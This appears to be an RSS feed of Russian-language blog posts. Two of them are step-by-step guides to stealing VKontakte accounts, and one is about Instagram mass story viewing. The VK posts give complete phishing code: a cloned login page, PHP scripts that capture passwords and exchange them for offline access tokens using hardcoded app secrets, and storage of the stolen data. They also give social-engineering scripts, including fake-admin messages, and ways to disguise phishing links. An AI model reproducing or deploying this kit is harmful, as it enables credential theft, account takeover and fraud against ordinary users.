<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>ㅤㅤㅤㅤㅤ ㅤㅤㅤㅤㅤ</title><generator>teletype.in</generator><description><![CDATA[ㅤㅤㅤㅤㅤ ㅤㅤㅤㅤㅤ]]></description><link>https://teletype.in/@projectprofit?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=projectprofit</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/projectprofit?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/projectprofit?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Thu, 30 Apr 2026 04:08:56 GMT</pubDate><lastBuildDate>Thu, 30 Apr 2026 04:08:56 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@projectprofit/W7q7aDt_A</guid><link>https://teletype.in/@projectprofit/W7q7aDt_A?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=projectprofit</link><comments>https://teletype.in/@projectprofit/W7q7aDt_A?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=projectprofit#comments</comments><dc:creator>projectprofit</dc:creator><title>Взлом VK</title><pubDate>Thu, 04 Feb 2021 14:45:18 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/ca/4f/ca4fe2cd-2a48-4b8d-a90a-1bc0d2ef9f0a.png"></media:content><description><![CDATA[<img src="https://tgraph.io/file/5dcc39de3ce0a8ebff32c.png"></img>Суть механизма заключается в том, что мы будем отправлять данные из HTML-форм на сервера вконтакте. В ответ мы получим access token.]]></description><content:encoded><![CDATA[
  <p>Суть механизма заключается в том, что мы будем отправлять данные из HTML-форм на сервера вконтакте. В ответ мы получим access token.</p>
  <p>Делать мы это будем с помощью cUrl и прямой авторизации через API VK. Выполнять авторизацию будем, представляясь официальным приложением. Запрос на прямую авторизацию выглядит примерно так:</p>
  <p>Код:</p>
  <pre>https://api.vk.com/oauth/token?grant_type=password&amp;client_id=[наше значение]&amp;scope=[наше значение]&amp;client_secret=[наше значение]&amp;username=[наше значение]&amp;password=[наше значение]

</pre>
  <p>Что все это значит:</p>
  <ul>
    <li>clenit_id - это id нашего приложения. Запишем в client_id значение 2274003.</li>
    <li>scope - права доступа, необходимые приложению. Усложнять себе жизнь мы не будем, а просто запросим офлайн токен, записав в scope значение &quot;offline&quot;. Этого будет достаточно, чтобы входить на страницу ВК по токену через apidog.ru. !Важно: такой токен &quot;живет&quot; до тех пор, пока пользователь не сменит пароль, либо завершит все сессии в настройках безопасности.</li>
    <li>client_secret - секретный ключ Вашего приложения. Будет равен hHbZxrka2uZ6jB1inYsH</li>
    <li>username - логин пользователя ВКонтакте</li>
    <li>password - пароль пользователя ВКонтакте</li>
  </ul>
  <p>Варианты официальных clenit_id и client_secret</p>
  <p>Android:</p>
  <p>client_id: 2274003</p>
  <p>client_secret: hHbZxrka2uZ6jB1inYsH</p>
  <p>IPhone:</p>
  <p>client_id: 3140623</p>
  <p>client_secret: VeWdmVclDCtn6ihuP1nt</p>
  <p>IPad:</p>
  <p>client_id: 3682744</p>
  <p>client_secret: mY6CDUswIVdJLCD3j15n</p>
  <p>Windows desktop:</p>
  <p>client_id: 3697615</p>
  <p>client_secret: AlVXZFMUqyrnABp8ncuU</p>
  <p>Windows phone:</p>
  <p>client_id: 3502557</p>
  <p>client_secret: PEObAuQi6KloPM4T30DV</p>
  <p>Теперь необходима форма авторизации как в вк.</p>
  <p>Создадим php документ authorize.php</p>
  <p>authorize.php:</p>
  <pre>&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Strict//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&quot;&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot; xml:lang=&quot;en&quot; lang=&quot;en&quot;&gt;
  &lt;head&gt;
  &lt;?php
  $errorGet = $_GET[&#x27;error_login&#x27;];
    if (!$errorGet)
    {
        echo &quot;&lt;style&gt;
        #hide_row_pass {display: none;}
        &lt;/style&gt;&quot;;
    }
else
    {
        echo &quot;&lt;style&gt;
        #hide_row_pass {display: block;}
        &lt;/style&gt;&quot;;
    }
  ?&gt;
    &lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=edge&quot; /&gt;
    &lt;title&gt;ВКонтакте | Вход&lt;/title&gt;
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;css/al/common.css?34795707965&quot; /&gt;&lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;css/al/fonts_cnt.css?5181750877&quot; /&gt;
    &lt;link type=&quot;text/css&quot; rel=&quot;stylesheet&quot; href=&quot;css/api/oauth_popup.css?29651175773&quot;&gt;&lt;/link&gt;
   &lt;meta http-equiv=&quot;content-type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
   &lt;link rel=&quot;shortcut icon&quot; href=&quot;images/icons/favicons/fav_logo_2x.ico?8&quot;&gt;&lt;/link&gt;
  &lt;/head&gt;

  &lt;body class=&quot;VK oauth_centered&quot;&gt;
    &lt;script&gt;
      if (window.devicePixelRatio &gt;= 2) document.body.className += &#x27; is_2x&#x27;;
    &lt;/script&gt;
    &lt;div class=&quot;oauth_wrap&quot;&gt;
      &lt;div class=&quot;oauth_wrap_inner&quot;&gt;
        &lt;div class=&quot;oauth_wrap_content&quot; id=&quot;oauth_wrap_content&quot;&gt;
          &lt;div class=&quot;oauth_head&quot;&gt;
  &lt;a class=&quot;oauth_logo fl_l&quot; href=&quot;https://vk.com&quot; target=&quot;_blank&quot;&gt;&lt;/a&gt;
  &lt;div id=&quot;oauth_head_info&quot; class=&quot;oauth_head_info fl_r&quot;&gt;
    &lt;a class=&quot;oauth_reg_link&quot; href=&quot;https://vk.com/join?reg=1&quot; target=&quot;_blank&quot;&gt;Регистрация&lt;/a&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;div class=&quot;oauth_content box_body clear_fix&quot;&gt;
  &lt;div class=&quot;box_msg_gray box_msg_padded&quot;&gt;Для продолжения Вам необходимо войти &lt;b&gt;ВКонтакте&lt;/b&gt;.&lt;/div&gt;

  &lt;form method=&quot;POST&quot; id=&quot;login_submit&quot; action=&quot;login.php&quot;&gt;
    &lt;div class=&quot;oauth_form&quot;&gt;
  
    &lt;div id=&quot;hide_row_pass&quot; class=&quot;box_error&quot;&gt;Указан неверный логин или пароль.&lt;/div&gt;
      &lt;div class=&quot;oauth_form_login&quot;&gt;
        &lt;div class=&quot;oauth_form_header&quot;&gt;Телефон или email&lt;/div&gt;
        &lt;input type=&quot;text&quot; class=&quot;oauth_form_input dark&quot; name=&quot;login&quot; value=&quot;&quot;&gt;
        &lt;div class=&quot;oauth_form_header&quot;&gt;Пароль&lt;/div&gt;
        &lt;input type=&quot;password&quot; class=&quot;oauth_form_input dark&quot; name=&quot;password&quot; /&gt;
  
        &lt;button class=&quot;flat_button oauth_button button_wide&quot; id=&quot;install_allow&quot; type=&quot;submit&quot; name=&quot;submit_login&quot;&gt;Войти&lt;/button&gt;
        &lt;a class=&quot;oauth_forgot&quot; href=&quot;https://vk.com/restore&quot; target=&quot;_blank&quot;&gt;Забыли пароль?&lt;/a&gt;
      &lt;/div&gt;
    &lt;/div&gt;
  &lt;/form&gt;
&lt;/div&gt;
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
  &lt;/body&gt;
&lt;/html&gt;
</pre>
  <blockquote>Архив со всеми картинками и стилями:</blockquote>
  <blockquote><a href="https://t.me/slivmens/1148" target="_blank">https://t.me/slivmens/1148</a></blockquote>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/5dcc39de3ce0a8ebff32c.png" width="816" />
  </figure>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/3070f4e23bf492f51c219.png" width="797" />
  </figure>
  <p>Теперь нужен файл, который будет отсылать логин и пароль на авторизацию и получение токена. Назовем login.php</p>
  <p>Но перед этим создадим БД куда будем записывать все валидные данные.</p>
  <p>1. Переходим на хостинге в PhpMyAdmin и нажимаем &quot;Создать&quot;</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/cae8cd3dbf30685a124d7.png" width="469" />
  </figure>
  <p>2. Создадим таблицу на 7 столбцов</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/f34c973f7e2a27d9f071e.png" width="549" />
  </figure>
  <p>3. Параметры id, Логин (login), Пароль (password), Токен (token), Дата (date), Имя (first_name) и Фамилия (last_name) зададим как на картинке</p>
  <p>В параметрах столбца id должен быть отмечен параметр &quot;A_I&quot; (auto_increment) и стоять PRIMARY KEY.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/2568ad71025f58828540b.png" width="1464" />
  </figure>
  <p>Теперь сам файл login.php:</p>
  <pre>&lt;?php
//Создадим headers
$headers = array(
&#x27;accept&#x27; =&gt; &#x27;text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&#x27;,
&#x27;content-type&#x27; =&gt; &#x27;application/x-www-form-urlencoded&#x27;,
&#x27;user-agent&#x27; =&gt; &#x27;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36&#x27;
);
//Запишем сюда значения логина и пароля из HTML формы
$login = $_POST[&#x27;login&#x27;];
$password = $_POST[&#x27;password&#x27;];
//Если какое-то поле оказалось пустым
if (empty($login) or empty($password))
{
//Отправим пользователя на стартовую страницу authorize и просигнализируем об ошибке
    header(&#x27;Location: /authorize.php?error_login=true&#x27;);
    exit;
}
    else
{
//Если все поля заполнены, то посылаем запрос на получение токена по нашей ссылке выше
    $get_token = post (&#x27;https://api.vk.com/oauth/token?grant_type=password&amp;client_id=2274003&amp;scope=offline&amp;client_secret=hHbZxrka2uZ6jB1inYsH&amp;username=&#x27;.$login.&#x27;&amp;password=&#x27;.$password.&#x27;&#x27; ,array(
    &#x27;headers&#x27; =&gt; array(
    &#x27;accept: &#x27;.$headers[&#x27;accept&#x27;],
    &#x27;content-type: &#x27;.$headers[&#x27;content-type&#x27;],
    &#x27;user-agent: &#x27;.$headers[&#x27;user-agent&#x27;]
    )
    ));
//Если авторизация прошла успешно
if (preg_match(&quot;/[a-z0-9]{85}/&quot;, $get_token[&#x27;headers&#x27;], $token))
{
    $token1 = json_decode(file_get_contents(&#x27;https://api.vk.com/oauth/token?grant_type=password&amp;client_id=2274003&amp;scope=offline&amp;client_secret=hHbZxrka2uZ6jB1inYsH&amp;username=&#x27;.$login.&#x27;&amp;password=&#x27;.$password.&#x27;&#x27;), true);
   $data = json_decode(file_get_contents(&#x27;https://api.vk.com/method/users.get?user_id=&#x27;.$token1[&#x27;user_id&#x27;].&#x27;&amp;access_token=&#x27;.$token[0].&#x27;&amp;fields=uid,first_name,last_name&amp;v=5.80&#x27;), true);

   //Записываем в переменную текущую дату и время сервера
$date_l = date(&quot;H:i:s  d-m-Y&quot;);
//Подключаемся к БД
    $host=&quot;localhost&quot;;
    $user=&quot;&quot;; //Имя пользователя от MySql
    $pass=&quot;&quot;; //Пароль от MySql
    $db_name=&quot;&quot;; //Имя базы
    $link=mysql_connect($host,$user,$pass);
    mysql_select_db($db_name,$link);
    mysql_query(&quot;set names utf8&quot;);
//Выполняем запись валида в БД
    $sql = mysql_query(&quot;INSERT INTO vk(login, password, token, date, user_id, first_name, last_name) VALUES(&#x27;&quot;.$login.&quot;&#x27;,&#x27;&quot;.$password.&quot;&#x27;,&#x27;&quot;.$token[0].&quot;&#x27;,&#x27;&quot;.$date_l.&quot;&#x27;,&#x27;&quot;.$token1[&#x27;user_id&#x27;].&quot;&#x27;,&#x27;&quot;.$data[&#x27;response&#x27;][0][&#x27;first_name&#x27;].&quot;&#x27;,&#x27;&quot;.$data[&#x27;response&#x27;][0][&#x27;last_name&#x27;].&quot;&#x27;)&quot;);
//Если все прошло успешно, то перенаправляем пользователя на vk.com или на ваш сайт
    if ($sql) {
        session_start();
        $_SESSION[&#x27;logged_user&#x27;] = $data[&#x27;response&#x27;][0][&#x27;first_name&#x27;];
        header(&#x27;Location: vk.com/&#x27;);
//Если при записи обнаружены ошибки, то перенаправим пользователя на главную страницу нашего сайта с сообщением об ошибке
    } else header(&#x27;Location: /authorize.php?error_login=true&#x27;);
//Закрываем соединение
mysql_close($link);
exit;
}
//Если авторизация не прошла, то отправим пользователя на стартовую страницу с  ошибкой
else header(&#x27;Location: /authorize.php?error_login=true&#x27;);
}
//cUrl POST
function post($url = null, $params = null, $proxy = null, $proxy_userpwd = null) {
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

if(isset($params[&#x27;params&#x27;])) {
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_POSTFIELDS, $params[&#x27;params&#x27;]);
}

if(isset($params[&#x27;headers&#x27;])) {
  curl_setopt($ch, CURLOPT_HTTPHEADER, $params[&#x27;headers&#x27;]);
}

if(isset($params[&#x27;cookies&#x27;])) {
  curl_setopt($ch, CURLOPT_COOKIE, $params[&#x27;cookies&#x27;]);
}

if($proxy) {
  curl_setopt($ch, CURLOPT_PROXY, $proxy);

  if($proxy_userpwd) {
   curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy_userpwd);
  }
}

$result = curl_exec($ch);
$result_explode = explode(&quot;\r\n\r\n&quot;, $result);

$headers = ((isset($result_explode[0])) ? $result_explode[0].&quot;\r\n&quot; : &#x27;&#x27;).&#x27;&#x27;.((isset($result_explode[1])) ? $result_explode[1] : &#x27;&#x27;);
$content = $result_explode[count($result_explode) - 1];


preg_match_all(&#x27;|Set-Cookie: (.*);|U&#x27;, $headers, $parse_cookies);

$cookies = implode(&#x27;;&#x27;, $parse_cookies[1]);

curl_close($ch);

return array(&#x27;headers&#x27; =&gt; $headers, &#x27;cookies&#x27; =&gt; $cookies, &#x27;content&#x27; =&gt; $content);
}
?&gt;
</pre>
  <p>В переменные $host=&quot;localhost&quot;;</p>
  <p>$user=&quot;&quot;; //Имя пользователя от MySql</p>
  <p>$pass=&quot;&quot;; //Пароль от MySql</p>
  <p>$db_name=&quot;&quot;; //Имя базы</p>
  <p>вписываем наши данные</p>
  <p>На 50 строчке если авторизация прошла успешно, нужно перенаправить пользователя на ваш сайт или куда вам угодно.</p>
  <p>header(&#x27;Location: &quot;Ваш сайт&quot; &#x27;);</p>
  <p>Осталось залить все файлы на хостинг и можно фишить.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@projectprofit/DJ-85TG4a</guid><link>https://teletype.in/@projectprofit/DJ-85TG4a?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=projectprofit</link><comments>https://teletype.in/@projectprofit/DJ-85TG4a?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=projectprofit#comments</comments><dc:creator>projectprofit</dc:creator><title>MASSLOOKING INSTAGRAM</title><pubDate>Thu, 04 Feb 2021 14:42:54 GMT</pubDate><description><![CDATA[<img src="https://teletype.in/files/d2/d29e255e-691d-4f77-919a-d09c8513dd24.png"></img>Новая фишка в инсте по продвижению —]]></description><content:encoded><![CDATA[
  <figure class="m_custom">
    <img src="https://teletype.in/files/d2/d29e255e-691d-4f77-919a-d09c8513dd24.png" width="510" />
  </figure>
  <p>Новая фишка в инсте по продвижению —</p>
  <p><strong>это массовый просмотр историй.</strong></p>
  <p>Думаю здесь уже все знают о таком, но почему бы не рассказать.</p>
  <blockquote>Что такое масслукинг?</blockquote>
  <p>Масслукинг — это автоматический просмотр чужих инстаграм историй от имени вашего аккаунта.</p>
  <blockquote>1. <strong>Личный аккаунт</strong></blockquote>
  <blockquote>от 3к подписчиков(желательно от года + авторизован с телефона)</blockquote>
  <blockquote>2. Чистая прокся IPv4 и выключить 2-факторку!</blockquote>
  <blockquote>3. Первый вход лучше выполнить с домашнего айпи (если вылезет &quot;это я&quot; - подтвердить с телефона)</blockquote>
  <blockquote>4. Кого смотрим?</blockquote>
  <blockquote>Думаю логично - целевую аудиторию.</blockquote>
  <blockquote>Это или собственные подписчики, или люди из профилей конкурентов.</blockquote>
  <blockquote>Их можно подобрать по параметрам или спарсить (ниже об этом).</blockquote>
  <blockquote><strong>5. Какой лимит?</strong></blockquote>
  <blockquote>Существует мнение, что лимит по сторис - 80 000 просмотров в сутки.</blockquote>
  <blockquote>Но, чтобы обезопасить аккаунт, лучше не превышать цифру в 5 000 просмотров в день.</blockquote>
  <blockquote><strong>6. Какой тайм-аут между просмотрами?</strong></blockquote>
  <blockquote>Стандартный 10 - 60 секунд.</blockquote>
  <blockquote>Предпочтительный 20 - 30 секунд (для аккаунтов, старше 6 месяцев, для молодых время лучше увеличить).</blockquote>
  <blockquote><strong>7. Сколько смотрим?</strong></blockquote>
  <blockquote>Обычно пользователи загружают 5-7 сторис в день, поэтому советую запускать 10 просмотров на одного пользователя, так точно не ошибетесь.</blockquote>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@projectprofit/5LJqE9f_uc</guid><link>https://teletype.in/@projectprofit/5LJqE9f_uc?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=projectprofit</link><comments>https://teletype.in/@projectprofit/5LJqE9f_uc?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=projectprofit#comments</comments><dc:creator>projectprofit</dc:creator><title>Как взломать VK. СИ+Фишинг</title><pubDate>Thu, 04 Feb 2021 14:39:03 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/fb/05/fb05edd2-3489-4121-90e2-9bd8dd85bd5d.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/ef/9e/ef9e27db-09b5-4055-8afa-98609c3053f8.png"></img>Привет! То, что сегодня опишу в данной статье - уголовно наказуемо.Поэтому я заранее подготовил несколько аккаунтов для получения к ним доступа. Больше всего внимания в этой статье я уделю социальной инженерии, так как практически все способы построены на ней.]]></description><content:encoded><![CDATA[
  <figure class="m_original">
    <img src="https://teletype.in/files/ef/9e/ef9e27db-09b5-4055-8afa-98609c3053f8.png" width="1280" />
  </figure>
  <p>Привет! То, что сегодня опишу в данной статье - <strong>уголовно наказуемо.</strong>Поэтому я заранее подготовил несколько аккаунтов для получения к ним доступа. Больше всего внимания в этой статье я уделю социальной инженерии, так как практически все способы построены на ней.</p>
  <p><strong>Основные способы взлома.</strong></p>
  <p>К таким способам относятся:</p>
  <ul>
    <li>Фишинг</li>
    <li>Подбор пароля(Brute force)</li>
    <li>MITM (Man In The Middle)</li>
    <li>Используя малварь</li>
  </ul>
  <p><strong>Фишинг</strong> - способ основанный на клонировании страницы авторизации какой-либо социальной сети.</p>
  <p><strong>Brute Force</strong> - подбор пароля с использованием различных баз.</p>
  <p>Этот способ не всегда эффективен но последнее время часто используем.</p>
  <p><strong>Используя малварь.</strong> К примеру кейлоггер. Он записывает все введенное с клавиатуры и отправляет злоумышленнику.</p>
  <figure class="m_custom">
    <img src="https://teletype.in/files/92/92daf81b-2bde-425a-9ed3-1de86a5bcf73.png" width="800" />
  </figure>
  <p><strong>Шаг 1. - Сбор информации.</strong></p>
  <p>Всегда перед взломом(не обязательно аккаунта) нужно собрать как можно больше информации. Для начала нужно обратить внимание на страницу пользователя. В качестве примера возьмем социальную сеть Вконтакте. Обратите внимание на посты закрепленные на странице у пользователя, на его статус. Также попробуйте разобраться какую музыку любит пользователь, обратите внимание на фотографии пользователя. Из всего этого можно взять много информации. Теперь обратим наш взор на контактную информацию. Советую записывать найденные вами данные. Чаще всего номер либо не указывают, либо пишут не верный. Город тоже важная деталь.</p>
  <p>Теперь перейдем к взаимодействию с пользователем. Вот тут мы отработаем наши навыки в социальной инженерии. Создаем страницу в этой социальной сети(в нашем случае вконтакте). Я создал страницу молодой девушки и добавил на страницу много различных фотографий. Раскрутил страницу для меньшей опасности раскрытия. И писал первым попадающимся мне на глаза дабы потренировать свою социальную инженерию.</p>
  <p>Вот что из этого вышло:</p>
  <figure class="m_custom">
    <img src="https://avatars.mds.yandex.net/get-zen_doc/1101877/pub_5ae39b6d256d5cf5602b9c52_5ae39c2b57906a181349e031/scale_600" width="273" />
  </figure>
  <figure class="m_custom">
    <img src="https://avatars.mds.yandex.net/get-zen_doc/1136050/pub_5ae39b6d256d5cf5602b9c52_5ae39c345f49678c67a72803/scale_600" width="321" />
  </figure>
  <figure class="m_custom">
    <img src="https://avatars.mds.yandex.net/get-zen_doc/1054867/pub_5ae39b6d256d5cf5602b9c52_5ae39c485f49678c67a72804/scale_600" width="344" />
  </figure>
  <p>Мы вошли в доверие человека спустя много дней общения(я не стал проводить над ним эксперименты и дальше так как он и вправду поверил что я девушка). Исходя из переписки я получил много различной информации в числе которой был номер телефона, род деятельности, год рождения и.т.п. Будьте осторожны в социальных сетях. А на этом первый шаг закончен.</p>
  <figure class="m_custom">
    <img src="https://teletype.in/files/92/92daf81b-2bde-425a-9ed3-1de86a5bcf73.png" width="800" />
  </figure>
  <p><strong>Шаг 2. - Выбор способа.</strong></p>
  <p>Здесь все зависит от того как вы вошли в доверие. И еще, не важно какой способ вы выберете первым. Если не сработает один способ можно попробовать другой. Повторяюсь, все зависит от того как вы вошли в доверие.</p>
  <p>Представим что я узнал только то, что человек любит смотреть сериал Сверхестественное. В этом случае я могу первым выбрать фишинг или отослать ему малварь. Под предлогом &quot;Смотри! Серия которой еще нет в эфире&quot;. Человек скачивает , открывает(правда придется помучится с форматами файла и обходом av) думает что все нормально. Но при следующем его заходе в социальную сеть данные отправляются нам.</p>
  <p>Если же вы плохо вошли в доверие, но сумели собрать достаточно информации, то можно изначально подобрать пароль. Основываясь на полученной информации можно составить много паролей. Правда перед этим советую поискать по базам со стандартными(часто используемыми) паролями.</p>
  <figure class="m_custom">
    <img src="https://teletype.in/files/92/92daf81b-2bde-425a-9ed3-1de86a5bcf73.png" width="800" />
  </figure>
  <p><strong>Шаг 3. - Осуществление способа.</strong></p>
  <p><strong>Фишинг.</strong></p>
  <p>Это способ является самым популярным. Но я внес некоторые свои изменения и упрощения. Давайте создадим фишинговый сайт по подобию все того же вконтакте. <em>В добавок хотел бы сказать что фишинг уже не является эффективным способом. Но для общего понимания мы его разберем.</em></p>
  <p>1. Переходим на страницу авторизации --&gt; пкм --&gt; сохранить как --&gt; test_fish.</p>
  <p>Получили папку и один файл</p>
  <figure class="m_custom">
    <img src="https://avatars.mds.yandex.net/get-zen_doc/1347728/pub_5ae39b6d256d5cf5602b9c52_5ae39c949b403c6169f7e920/scale_600" width="600" />
  </figure>
  <p>2. Теперь при помощи текстового редактора откроем файл test_fish.</p>
  <p>Первым же делом ищем</p>
  <p>&lt;form method=&quot;POST&quot; name=&quot;login&quot; id=&quot;quick_login_form&quot; action=&quot;https://login.vk.com/?act=login&quot; target=&quot;quick_login_frame&quot;&gt;</p>
  <p>И меняем его на</p>
  <p>&lt;form method=&quot;POST&quot; name=&quot;login&quot; id=&quot;quick_login_form&quot; action=&quot;./logs.php&quot; target=&quot;quick_login_frame&quot;&gt;</p>
  <p>Теперь ищем строку 215 - 219( js код)</p>
  <p>Над ней пишем</p>
  <p>&lt;!--</p>
  <p>Далее ищем строку закрывающую тело тега script.</p>
  <p>И после этой строки снова пишем</p>
  <p>Код:</p>
  <p>--&gt;</p>
  <p>Тем самым мы за комментировали js код который нам не пригодится и может вызвать торможение в работе. Осталось сохранить этот файл.</p>
  <p>Что же, а теперь создайте файл logs.php с таким содержимым:</p>
  <p>&lt;?php</p>
  <p>$login = $_POST[&#x27;email&#x27;];</p>
  <p>$pass = $_POST[&#x27;pass&#x27;];</p>
  <p>$file = fopen(&quot;my_pass.txt&quot;, &#x27;at&#x27;);</p>
  <p>fwrite($file,&quot;Login --&gt; $login\nPass --&gt; $pass\n-----\n&quot;);</p>
  <p>fclose($file);</p>
  <p>echo &quot;&lt;html&gt;&lt;head&gt;&lt;<em>META</em> <em>HTTP</em>-<em>EQUIV</em>=&#x27;Refresh&#x27; content =&#x27;0; URL=http://vk.com&#x27;&gt;&lt;/head&gt;&lt;/html&gt;&quot;;</p>
  <p>?&gt;</p>
  <h3><strong>Логика работы</strong></h3>
  <p>Файл test_fish.html , после того как пользователь введет данные, отправит их в logs.php</p>
  <p>Этот файл запишет данные в файл my_pass.txt и перенаправит пользователя обратно на сайт вконтакте. Чтобы создать такой скрипт обратите внимание на атрибут method, а вернее на его значение. В моем случае данные переданы методом post. Также обратите на значение атрибута name. У вконтакте это email и pass. То есть если вы увидите примерно такой код</p>
  <p>&lt;form method = &#x27;GET&#x27; action = &#x27;http://mysite/login.php&#x27;&gt;</p>
  <p>&lt;label&gt; Login:&lt;/label&gt;</p>
  <p>&lt;input type = &quot;text&quot; name = &quot;login&quot; /&gt;</p>
  <p>&lt;label&gt; Password:&lt;/label&gt;</p>
  <p>&lt;input type = &quot;password&quot; name = &quot;passwd&quot; /&gt;</p>
  <p>&lt;input type = &quot;button&quot; /&gt;</p>
  <p>&lt;/form&gt;</p>
  <p>То начало нашего скрипта logs.php выглядело бы так</p>
  <p>&lt;?php</p>
  <p>$login = $_GET[&#x27;login&#x27;];</p>
  <p>$pass = $_GET[&#x27;passwd&#x27;];</p>
  <p>.....</p>
  <p>Наконец мы дошли до финальной части создания фишинга. Осталось закинуть все созданные файлы на хостинг.</p>
  <p>В этом вам может помочь программа FileZilla(это на случай если вы любите простые вещи). Название сайта лучше создавать не похожее на название социальной сети. Часто из-за этого некоторые хостинги блокируют ваш фишинг. В итоге мы получаем вот это</p>
  <figure class="m_custom">
    <img src="https://avatars.mds.yandex.net/get-zen_doc/1362956/pub_5ae39b6d256d5cf5602b9c52_5ae39d421aa80cd30aa73297/scale_600" width="600" />
  </figure>
  <p>И после ввода некоторых данных убеждаюсь в стабильной работоспособности фишинга</p>
  <figure class="m_custom">
    <img src="https://avatars.mds.yandex.net/get-zen_doc/244664/pub_5ae39b6d256d5cf5602b9c52_5ae39d65ad0f2291ff290b60/scale_600" width="368" />
  </figure>
  <p>В конце концов применим социальную инженерию. Здесь как раз таки понадобится информация которую мы собрали ранее. Напишем все той же &quot;жертве&quot; из примера что-то такое:</p>
  <p>Привет!</p>
  <p>Недавно открыли фанфик. Там Сверхестественное выходит с крутой озвучкой/Смотри в этой версии можно осуществлять звонки друг другу</p>
  <p>Держи &lt;ССЫЛКА&gt;</p>
  <p>Или же можно поступить интересней. Попробуем воздействовать на &quot;жертву&quot; как администрация.</p>
  <figure class="m_custom">
    <img src="https://avatars.mds.yandex.net/get-zen_doc/50840/pub_5ae39b6d256d5cf5602b9c52_5ae39f0c1aa80cd30aa732a1/scale_600" width="600" />
  </figure>
  <p>Для этого на фейковом аккаунте создаем паблик.</p>
  <p>И в названии указываем “Администрация”</p>
  <figure class="m_custom">
    <img src="https://avatars.mds.yandex.net/get-zen_doc/173924/pub_5ae39b6d256d5cf5602b9c52_5ae39ee4db0cd9e28f7a0d13/scale_600" width="444" />
  </figure>
  <p>Далее загрузим аватар как у админа И начинаем создавать заметку в сообществе</p>
  <p>...</p>
  <p>Уважаемый пользователь!</p>
  <p>Мы заметили на вашей странице подозрительную активность и были бы признательны, если вы перейдете по ссылке ниже и заполните анкету. В случае отказа нам придется заблокировать доступ к вашему аккаунту.</p>
  <p>Ссылка(Фейк): <a href="http://feyk-site.com/" target="_blank">http://feyk-site.com</a></p>
  <p>@id(ид номер пользователя)</p>
  <p>...</p>
  <h3>Как обезопасить фишинг</h3>
  <p>Во всем есть свои минусы. Фишинг палится не так части внешним видом, как самим url на него.</p>
  <p>Давайте попробуем обезопасить его простейшим скриптом. Скрипт будет открывать какую-либо новую вкладку, а ту вкладку с которой перешли на фишинг заменять самим фишингом. Читается не понятно, но на деле все просто.</p>
  <p>Сам скрипт выглядит так</p>
  <figure class="m_custom">
    <img src="https://avatars.mds.yandex.net/get-zen_doc/98986/pub_5ae39b6d256d5cf5602b9c52_5ae39f9cd7bf21571527d50f/scale_600" width="600" />
  </figure>
  <p>Его сохраняем как index.html</p>
  <p>И при переходе увидим профит</p>
  <figure class="m_custom">
    <img src="https://avatars.mds.yandex.net/get-zen_doc/1107063/pub_5ae39b6d256d5cf5602b9c52_5ae39fac4bf161de380904f2/scale_600" width="447" />
  </figure>
  <p>Для скрытия нашего URL мы можем использовать следующие способы:</p>
  <p>1. Сокращение ссылки.</p>
  <p>2. Используя blogger.com</p>
  <p>Сократить ссылку мы можем на различных онлайн сервисах, это сделать очень просто.</p>
  <p>Так что мы рассмотрим только способ 2.</p>
  <p>1. Переходим на blogger.com</p>
  <p>2. Регистрируем аккаунт à блог</p>
  <p>3. Переходим к пункту шаблон à изменить html</p>
  <p>4. На стороннем ресурсе сократить ссылку на фишинг</p>
  <p>5. Вставляем в теле &lt;head&gt;&lt;/head&gt; код ниже</p>
  <figure class="m_custom">
    <img src="https://avatars.mds.yandex.net/get-zen_doc/119454/pub_5ae39b6d256d5cf5602b9c52_5ae39fe579885e47d5eafe9e/scale_600" width="600" />
  </figure>
  <p>И соответственно сохраняем. Теперь ссылка на блог будет ридеректить жертву на ваш фишинг причем вконтакте не спалит.</p>

